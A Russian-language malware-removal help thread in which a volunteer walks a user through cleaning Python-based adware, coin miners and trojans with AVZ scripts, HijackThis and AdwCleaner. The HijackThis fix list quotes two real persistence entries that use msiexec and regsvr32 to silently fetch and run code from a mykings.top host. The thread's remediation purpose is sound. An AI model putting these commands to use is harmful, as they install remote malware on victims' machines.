Дмитрий Москавчук 0 Опубликовано 1 апреля, 2018 Share Опубликовано 1 апреля, 2018 у меня тоже проблема с vofer и Vof 0.0.1 Помогите решить проблему Я сделал как писали выше, вот файлы с программы Farbar Recovery Scan Tool . Downloads.rar Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 1 апреля, 2018 Share Опубликовано 1 апреля, 2018 Порядок оформления запроса о помощи Цитата Ссылка на сообщение Поделиться на другие сайты
Дмитрий Москавчук 0 Опубликовано 1 апреля, 2018 Автор Share Опубликовано 1 апреля, 2018 Помогите Сообщение от модератора Mark D. Pearlstone Темы объединены CollectionLog-2018.04.01-18.43.zip Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 1 апреля, 2018 Share Опубликовано 1 апреля, 2018 Здравствуйте!- Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); QuarantineFile('C:\Users\DNS\AppData\Roaming\Adobe\gfxm\msn.vbs', ''); QuarantineFile('C:\Users\DNS\appdata\roaming\adobe\gfxm\sfx3\sclomer.exe', ''); QuarantineFile('C:\Users\DNS\AppData\Roaming\ForceUpdateVOF\ml.py', ''); QuarantineFile('C:\Users\DNS\AppData\Roaming\ForceUpdateVOF\python\pythonw.exe', ''); QuarantineFile('C:\Users\DNS\AppData\Roaming\ForceUpdateVOF\updater.py', ''); QuarantineFile('C:\Users\DNS\AppData\Roaming\hdprotect\wrt.vbs', ''); QuarantineFile('C:\Users\DNS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\soundman.exe', ''); QuarantineFile('C:\Users\DNS\AppData\Roaming\vofer\app.py', ''); QuarantineFile('C:\Users\DNS\AppData\Roaming\vofer\ml.py', ''); QuarantineFile('C:\Users\DNS\AppData\Roaming\vofer\python\pythonw.exe', ''); QuarantineFile('C:\Users\DNS\AppData\Roaming\Vofer2\IQmanager\app.py', ''); QuarantineFile('C:\Users\DNS\AppData\Roaming\Vofer2\IQmanager\ml.py', ''); QuarantineFile('C:\Users\DNS\AppData\Roaming\Vofer2\python\pythonw.exe', ''); QuarantineFile('C:\Users\DNS\Desktop\Рабочий стол\Google Chrome.lnk', ''); QuarantineFile('C:\Users\DNS\Desktop\Рабочий стол\Opera.lnk', ''); QuarantineFile('C:\Users\DNS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnk', ''); QuarantineFile('C:\Users\DNS\AppData\Roaming\Vofer2\updater.py', ''); QuarantineFile('C:\windows\TEMP\{ACD7618A-8184-4D38-B861-FC14B3E510DD}.exe', ''); QuarantineFileF('C:\Users\DNS\appdata\roaming\adobe\gfxm\sfx3\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0); QuarantineFileF('c:\users\dns\appdata\roaming\forceupdatevof', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 , 0); QuarantineFileF('c:\users\dns\appdata\roaming\vofer', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 , 0); QuarantineFileF('c:\users\dns\appdata\roaming\vofer2', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 , 0); DeleteFile('AVG-Secure-Search-Update_JUNE2013_TB_rmv.job', '64'); DeleteFile('C:\Users\DNS\AppData\Roaming\Adobe\gfxm\msn.vbs', '32'); DeleteFile('C:\Users\DNS\appdata\roaming\adobe\gfxm\sfx3\sclomer.exe'); DeleteFile('C:\Users\DNS\AppData\Roaming\ForceUpdateVOF\ml.py', '32'); DeleteFile('C:\Users\DNS\AppData\Roaming\ForceUpdateVOF\python\pythonw.exe', '32'); DeleteFile('C:\Users\DNS\AppData\Roaming\ForceUpdateVOF\updater.py', '32'); DeleteFile('C:\Users\DNS\AppData\Roaming\hdprotect\wrt.vbs', '32'); DeleteFile('C:\Users\DNS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\soundman.exe', '32'); DeleteFile('C:\Users\DNS\AppData\Roaming\vofer\app.py', '32'); DeleteFile('C:\Users\DNS\AppData\Roaming\vofer\ml.py', '32'); DeleteFile('C:\Users\DNS\AppData\Roaming\vofer\python\pythonw.exe', '32'); DeleteFile('C:\Users\DNS\AppData\Roaming\Vofer2\IQmanager\app.py', '32'); DeleteFile('C:\Users\DNS\AppData\Roaming\Vofer2\IQmanager\ml.py', '32'); DeleteFile('C:\Users\DNS\AppData\Roaming\Vofer2\python\pythonw.exe', '32'); DeleteFile('C:\Users\DNS\AppData\Roaming\Vofer2\updater.py', '32'); DeleteFile('C:\windows\TEMP\{ACD7618A-8184-4D38-B861-FC14B3E510DD}.exe', '32'); ExecuteFile('schtasks.exe', '/delete /TN "AVG-Secure-Search-Update_JUNE2013_TB_rmv" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "ForceUpdateVOF" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "ForceUpdateVOF2" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "IQmanager" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "IQmanager2" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "vofer" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "vofer2" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Vofer22" /F', 0, 15000, true); DeleteFileMask('c:\users\dns\appdata\roaming\forceupdatevof', '*', true); DeleteFileMask('c:\users\dns\appdata\roaming\vofer', '*', true); DeleteFileMask('c:\users\dns\appdata\roaming\vofer2', '*', true); DeleteDirectory('c:\users\dns\appdata\roaming\forceupdatevof'); DeleteDirectory('c:\users\dns\appdata\roaming\vofer'); DeleteDirectory('c:\users\dns\appdata\roaming\vofer2'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'gfxmF'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start1'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end. После выполнения скрипта компьютер перезагрузится. - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.comПолученный ответ сообщите здесь (с указанием номера KLAN) - Перетащите лог Check_Browsers_LNK.log Перетащите лог Check_Browsers_LNK.log из папки AutoLogger\CheckBrowsersLNK на утилиту ClearLNK. Отчёт о работе прикрепите. Html5 geolocation provider [20120911]-->MsiExec.exe /I{12644DC5-2271-442B-816F-8CFFD3DDDF32} Shop for HP Supplies [2016/09/11 13:56:43]-->C:\Program Files (x86)\HP\Digital Imaging\HPSSupply\hpzscr01.exe -datfile hpqbud16.dat советую деинсталировать. Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. + O7 - IPSec: Name: win (2017/09/01) - {73152dce-b4ef-4e87-9326-819a34614160} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2017/09/01) - {73152dce-b4ef-4e87-9326-819a34614160} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2017/09/01) - {73152dce-b4ef-4e87-9326-819a34614160} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2017/09/01) - {73152dce-b4ef-4e87-9326-819a34614160} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2017/09/01) - {73152dce-b4ef-4e87-9326-819a34614160} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block сами настраивали? Цитата Ссылка на сообщение Поделиться на другие сайты
Дмитрий Москавчук 0 Опубликовано 1 апреля, 2018 Автор Share Опубликовано 1 апреля, 2018 KLAN-7852047656 отчет Сообщение от модератора Mark D. Pearlstone Не нужно цитировать сообщения полностью. Новая проверка ClearLNK-2018.04.01_19.41.10.log ClearLNK-2018.04.01_19.41.10.log CollectionLog-2018.04.01-19.54.zip CollectionLog-2018.04.01-20.25.zip Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 1 апреля, 2018 Share Опубликовано 1 апреля, 2018 Полученный ответ сообщите здесь (с указанием номера KLAN) А где ответ вирлаба по файлам? сами настраивали? тоже не ответили. Цитата Ссылка на сообщение Поделиться на другие сайты
Дмитрий Москавчук 0 Опубликовано 2 апреля, 2018 Автор Share Опубликовано 2 апреля, 2018 да, сам настраивал. Вот что мне ответили: Благодарим за обращение в Антивирусную ЛабораториюПрисланные вами файлы были проверены в автоматическом режиме.В антивирусных базах информация по присланным вами файлам отсутствует:msn.vbsGoogle Chrome.lnkMail.Ru.lnkВ перечисленных файлах обнаружена программа Riskware, которая может причинить вред вашему устройству:sclomer.exe - not-a-virus:RiskTool.Win32.BitCoinMiner.ibyuВ следующих файлах обнаружен вредоносный код:wrt.vbs - Trojan.VBS.Starter.hvsoundman.exe - Trojan.Win32.Scar.qpzjOpera.lnk - HEUR:Trojan.WinLNK.StartPage.genaФайлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте.Это сообщение сформировано автоматической системой обработки писем. Пожалуйста, не отвечайте на него.Антивирусная Лаборатория, Kaspersky Lab HQ cureit.log Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 2 апреля, 2018 Share Опубликовано 2 апреля, 2018 советую деинсталировать. Почему не деинсталировали? Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); TerminateProcessByName('c:\windows\syswow64\lsmos.exe'); QuarantineFile('C:\windows\help\lsmosee.exe', ''); QuarantineFile('c:\windows\system32\tiltwheelmouse.exe', ''); QuarantineFile('c:\windows\syswow64\lsmos.exe', ''); DeleteFile('C:\windows\help\lsmosee.exe', '32'); DeleteFile('c:\windows\syswow64\lsmos.exe', '32'); ExecuteFile('schtasks.exe', '/delete /TN "{E909228D-1B65-4ABA-9727-931ECAA83714}" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "DealPly" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Mysa2" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Mysa3" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "SafeWeb" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "SafeWeb2" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "VOF" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "VOF2" /F', 0, 15000, true); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start1'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end. После выполнения скрипта компьютер перезагрузится. - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.comПолученный ответ сообщите здесь (с указанием номера KLAN) "Пофиксите" в HijackThis (некоторые строки могут отсутствовать): O2 - HKLM\..\BHO: (no name) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - (no file) O2 - HKLM\..\BHO: (no name) - {9D717F81-9148-4f12-8568-69135F087DB0} - (no file) O2 - HKLM\..\BHO: (no name) - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - (no file) O2 - HKLM\..\BHO: (no name) - {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} - (no file) O2 - HKLM\..\BHO: (no name) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - (no file) O2-32 - HKLM\..\BHO: (no name) - {9D717F81-9148-4f12-8568-69135F087DB0} - (no file) O2-32 - HKLM\..\BHO: (no name) - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - (no file) O2-32 - HKLM\..\BHO: (no name) - {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} - (no file) O3 - HKLM\..\Toolbar: (no name) - !{09900DE8-1DCA-443F-9243-26FF581438AF} - (no file) O3 - HKLM\..\Toolbar: (no name) - !{95B7759C-8C7F-4BF1-B163-73684A933233} - (no file) O3 - HKLM\..\Toolbar: (no name) - !{fe704bf8-384b-44e1-8cf2-8dbeb3637a8a} - (no file) O3 - HKLM\..\Toolbar: (no name) - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - (no file) O3-32 - HKLM\..\Toolbar: (no name) - !{09900DE8-1DCA-443F-9243-26FF581438AF} - (no file) O3-32 - HKLM\..\Toolbar: (no name) - !{95B7759C-8C7F-4BF1-B163-73684A933233} - (no file) O3-32 - HKLM\..\Toolbar: (no name) - !{fe704bf8-384b-44e1-8cf2-8dbeb3637a8a} - (no file) O3-32 - HKLM\..\Toolbar: (no name) - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - (no file) O3-32 - HKLM\..\Toolbar: (no name) - {99079a25-328f-4bd4-be04-00955acaa0a7} - (no file) O4 - HKLM\..\Run: [start1] = C:\windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q O4 - HKLM\..\Run: [start] = C:\windows\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll O18 - Protocol: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - (no file) O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - (no file) O21 - HKLM\..\ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file) O21 - HKLM\..\ShellIconOverlayIdentifiers: 00avast - {472083B0-C522-11CF-8763-00608CC02F24} - (no file) O22 - Task: AdobeControlUtil - C:\Users\DNS\AppData\Roaming\ADOBEC~1\admres.exe /S (file missing) O22 - Task: DealPly - C:\Users\DNS\AppData\Roaming\DealPly\UPDATE~1\UPDATE~1.EXE /Check (file missing) O22 - Task: RunAsStdUser_GameCenterMailRu - C:\Users\DNS\AppData\Local\Mail.Ru\GameCenter\GameCenter@Mail.Ru.exe -updated -lowermode "nativeroot=d:\программы\mail.ru\perfect world" "nativelauncher=d:\программы\mail.ru\perfect world\launcher\launcher.exe" /unique=280948502 (file missing) O22 - Task: SafeWeb - C:\Users\DNS\AppData\Roaming\SafeWeb\python\pythonw.exe "C:\Users\DNS\AppData\Roaming\SafeWeb\ml.py" --APPNAME="SafeWeb" (file missing) O22 - Task: SafeWeb2 - C:\Users\DNS\AppData\Roaming\SafeWeb\python\pythonw.exe "C:\Users\DNS\AppData\Roaming\SafeWeb\updater.py" (file missing) O22 - Task: VOF - C:\Users\DNS\AppData\Roaming\VOF\python\pythonw.exe "C:\Users\DNS\AppData\Roaming\VOF\ml.py" --APPNAME="VOF" (file missing) O22 - Task: VOF2 - C:\Users\DNS\AppData\Roaming\VOF\python\pythonw.exe "C:\Users\DNS\AppData\Roaming\VOF\updater.py" (file missing) O22 - Task: \Microsoft\Windows Live\SOXE\Extractor Definitions Update Task - {3519154C-227E-47F3-9CC9-12C3F05817F1} - (no file) Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Скачайте AdwCleaner и сохраните его на Рабочем столе. Запустите его (в ОС Vista/Windows 7/8 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования. Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[s0].txt. Прикрепите отчет к своему следующему сообщению. Цитата Ссылка на сообщение Поделиться на другие сайты
Дмитрий Москавчук 0 Опубликовано 2 апреля, 2018 Автор Share Опубликовано 2 апреля, 2018 Re: Файл [KLAN-7856344792] newvirus@kaspersky.com Кому: Дима Москавчук сегодня, 18:12 Благодарим за обращение в Антивирусную ЛабораториюПрисланные вами файлы были проверены в автоматическом режиме.В следующих файлах обнаружен вредоносный код:lsmosee.exe - Trojan.Win32.BitCoinMiner.apkВ перечисленных файлах обнаружена программа Riskware, которая может причинить вред вашему устройству:lsmos.exe - not-a-virus:RiskTool.Win32.BitMiner.qsaФайлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте.Это сообщение сформировано автоматической системой обработки писем. Пожалуйста, не отвечайте на него.Антивирусная Лаборатория, Kaspersky Lab HQ . Отсканировал CollectionLog-2018.04.02-18.28.zip AdwCleanerS0.txt Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 2 апреля, 2018 Share Опубликовано 2 апреля, 2018 @Дмитрий Москавчук, почему вас каждый раз по два раза надо спрашивать? Почему не деинсталировали? Программы/расширения от Mail.ru используете? И рассширения от Yandex сами ставили? Цитата Ссылка на сообщение Поделиться на другие сайты
Дмитрий Москавчук 0 Опубликовано 2 апреля, 2018 Автор Share Опубликовано 2 апреля, 2018 все, деинсталировал. Маил не использую. Yandex не могу сказать даже, возможно сам. . CollectionLog-2018.04.02-20.16.zip Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 2 апреля, 2018 Share Опубликовано 2 апреля, 2018 Запустите повторно AdwCleaner (в ОС Vista/Windows 7/8 необходимо запускать через правую кн. мыши от имени администратора). В меню Tools ->Options (Инструменты ->Настройки) отметьте: Сброс политик IE Сброс политик Chrome [*]Нажмите кнопку "Scan" ("Сканировать"), а по окончанию сканирования нажмите кнопку "Cleaning" ("Очистка") и дождитесь окончания удаления. [*]Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[C0].txt. [*]Прикрепите отчет к своему следующему сообщению Внимание: Для успешного удаления нужна перезагрузка компьютера!!!. Цитата Ссылка на сообщение Поделиться на другие сайты
Дмитрий Москавчук 0 Опубликовано 5 апреля, 2018 Автор Share Опубликовано 5 апреля, 2018 Отчет AdwCleanerS1.txt Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 5 апреля, 2018 Share Опубликовано 5 апреля, 2018 @Дмитрий Москавчук, перечитайте внимательно, что просили. Цитата Ссылка на сообщение Поделиться на другие сайты
Дмитрий Москавчук 0 Опубликовано 5 апреля, 2018 Автор Share Опубликовано 5 апреля, 2018 Простите, невнимательно прочитал AdwCleanerC0.txt Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.